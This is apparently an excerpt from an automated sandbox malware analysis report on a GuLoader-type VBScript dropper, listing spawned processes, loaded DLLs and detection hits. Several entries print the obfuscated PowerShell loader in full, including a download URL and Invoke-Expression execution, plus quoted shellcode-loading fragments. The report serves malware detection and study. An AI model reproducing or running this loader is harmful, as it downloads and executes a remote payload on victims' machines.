TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1599797657.0000000007B6C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1246016018.00000232AF2D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244087582.00000232AF0D1000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", "";$Ndhjlps='Kontinentalsokkel';;$Klaube", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Yndlingsoffer)$GLOBAl:TalNETTeNE = [sYStEm.teXt.enCoDInG]::AScII.gEtsTrInG($EKsporTVrdI)$gLobAl:TrAMPAgE=$tALNETtenE.SubSTRIng($rAdiaTory,$HuppaHs176)<#Tillberes Patronymikaenes Euph
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unkneaded $Dschubba $Anticommutative), (Stats @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Volplaning71 = [AppDomain]::CurrentDomain.GetAssemblies()$glo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Felttyper)), $Predbjrn).DefineDynamicModule($Skraldgriner, $false).DefineType($Sekslberne, $Hostageship, [System.MulticastDelegate])$F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Yndlingsoffer)$GLOBAl:TalNETTeNE = [sYStEm.teXt.enCoDInG]::AScII.gEtsTrInG($EKsporTVrdI)$gLobAl:TrAMPAgE=$tALNETtenE.SubSTRIng($rAdiaTory,$HuppaHs176)<#Tillberes Patronymikaenes Euph
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst 